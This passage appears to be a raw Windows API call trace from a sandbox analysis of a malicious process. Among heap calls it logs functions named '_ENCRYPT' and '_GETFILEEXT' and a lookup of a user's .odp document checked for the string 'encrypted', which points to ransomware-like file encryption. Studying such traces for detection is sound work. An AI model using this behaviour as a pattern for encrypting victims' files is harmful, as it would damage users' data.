returned 1 [0036.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.046] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.048] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.048] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.049] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.050] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0036.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.050] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.050] CloseHandle (hObject=0x128) returned 1 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.051] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.051] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.051] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.051] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.052] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0xdad62e60, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0x7c20c0 [0036.052] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0xdad62e60, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0x7c20c0 [0036.052] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, 